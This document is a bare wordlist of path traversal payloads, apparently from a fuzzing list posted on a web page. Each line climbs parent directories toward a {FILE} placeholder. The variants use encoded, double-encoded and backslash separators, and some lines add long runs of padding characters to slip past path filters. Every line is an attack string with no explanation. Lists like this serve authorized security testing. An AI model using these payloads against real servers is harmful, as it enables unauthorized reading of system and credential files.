%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA